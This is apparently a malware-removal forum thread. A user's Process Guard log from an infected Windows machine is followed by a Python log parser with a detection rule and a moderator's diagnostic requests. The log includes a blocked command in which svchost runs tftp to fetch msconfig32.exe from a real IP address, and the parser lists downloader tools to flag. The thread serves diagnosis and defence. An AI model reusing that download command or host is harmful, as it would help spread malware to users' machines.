[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 24 - 19:23:29 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 24 - 19:23:29 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1844]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 24 - 19:23:30 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 24 - 19:23:31 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 24 - 19:23:31 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 24 - 19:23:31 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 24 - 19:23:31 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 24 - 19:23:32 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 24 - 19:23:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 24 - 19:23:32 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 24 - 19:23:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [396]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 24 - 19:23:33 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc339fcd23292f24dbf7535b49f0ce283 ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc43579fa1323614bb48e90dacb7a785f ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf8b92ef092572b4780c239a26cf94acc ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds3a10222c43348147a5a866c21bb684a5 ]
Wed 24 - 19:24:16 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 24 - 19:27:14 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ tftp.exe -i 202.124.162.214 get msconfig32.exe ]
Wed 24 - 19:37:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 416 -h 608 "global\0cf2543ec46819c1ac" ]
Wed 24 - 19:37:10 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [1716]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]
Wed 24 - 19:37:10 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Wed 24 - 19:37:20 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1040]
  • 0

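As an added example (not code from this thread or from Process Guard), here is a small Python parser for the three-line Process Guard execution entries posted above, with one detection rule that flags the blocked tftp.exe download attempt shown in the log. The sample log is constructed from the posted entries, and the DOWNLOADERS set is my assumption about which built-in downloaders a service host should never be launching.

```python
import re
from dataclasses import dataclass

# Constructed sample in Process Guard's format, taken from the entries posted above.
SAMPLE_LOG = r"""---Process Guard Log Started---
Wed 24 - 19:24:16 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 24 - 19:27:14 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ tftp.exe -i 202.124.162.214 get msconfig32.exe ]
Wed 24 - 19:37:20 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1040]
"""

# One execution event spans three lines: header, parent process, command line.
HEADER = re.compile(r'^\w{3} \d+ - (\d\d:\d\d:\d\d) \[EXECUTION\] "([^"]+)" was (allowed to run|blocked from running)$')
PARENT = re.compile(r'^\[EXECUTION\] Started by "([^"]+)" \[(\d+)\]$')
CMDLINE = re.compile(r'^\[EXECUTION\] Commandline - \[ (.*) \]$')

@dataclass
class Execution:
    time: str
    image: str
    blocked: bool
    parent: str
    parent_pid: int
    cmdline: str

def parse_executions(text):
    """Group the three-line EXECUTION entries; other lines (TERMINATE, banner) are skipped."""
    lines = [l.rstrip() for l in text.splitlines()]
    events, i = [], 0
    while i < len(lines):
        h = HEADER.match(lines[i])
        if h and i + 2 < len(lines):
            p, c = PARENT.match(lines[i + 1]), CMDLINE.match(lines[i + 2])
            if p and c:
                events.append(Execution(h.group(1), h.group(2), h.group(3).startswith("blocked"),
                                        p.group(1), int(p.group(2)), c.group(1)))
                i += 3
                continue
        i += 1
    return events

# Assumption: these built-in clients are only ever launched by a service host when
# something is pulling a payload down, as the "tftp.exe -i ... get" entry above shows.
DOWNLOADERS = {"tftp.exe", "ftp.exe"}

def suspicious_downloads(events):
    """Return events where a known downloader was invoked with a 'get' from a service host."""
    hits = []
    for e in events:
        name = e.image.rsplit("\\", 1)[-1].lower()
        parent = e.parent.rsplit("\\", 1)[-1].lower()
        if name in DOWNLOADERS and "get" in e.cmdline.lower().split() and parent == "svchost.exe":
            hits.append(e)
    return hits

if __name__ == "__main__":
    for hit in suspicious_downloads(parse_executions(SAMPLE_LOG)):
        print(f"{hit.time} parent={hit.parent}[{hit.parent_pid}] blocked={hit.blocked} :: {hit.cmdline}")
```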
#150
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Can you find this file:

c:\scvhost.reg

Right-click it and open with Notepad. Post the content please.

Also go to:
http://virusscan.jotti.org/
and have this file scanned:
c:\windows\system32\lsass.exe

Let me know the results.

Regards,
  • 0